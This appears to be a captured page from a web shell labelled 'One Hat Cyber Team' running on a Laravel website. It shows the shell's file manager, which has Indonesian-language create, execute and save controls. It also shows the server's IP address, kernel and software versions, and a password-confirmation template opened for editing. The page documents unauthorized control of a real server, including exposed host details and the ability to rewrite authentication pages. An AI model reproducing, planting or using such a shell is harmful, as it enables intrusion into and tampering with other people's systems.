One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
Compro-ISP
/
resources
/
views
/
auth
/
Edit File:
confirm-password.blade.php
<x-guest-layout> <div class="mb-4 text-sm text-gray-600"> {{ __('This is a secure area of the application. Please confirm your password before continuing.') }} </div> <form method="POST" action="{{ route('password.confirm') }}"> @csrf <!-- Password --> <div> <x-input-label for="password" :value="__('Password')" /> <x-text-input id="password" class="block mt-1 w-full" type="password" name="password" required autocomplete="current-password" /> <x-input-error :messages="$errors->get('password')" class="mt-2" /> </div> <div class="flex justify-end mt-4"> <x-primary-button> {{ __('Confirm') }} </x-primary-button> </div> </form> </x-guest-layout>
Simpan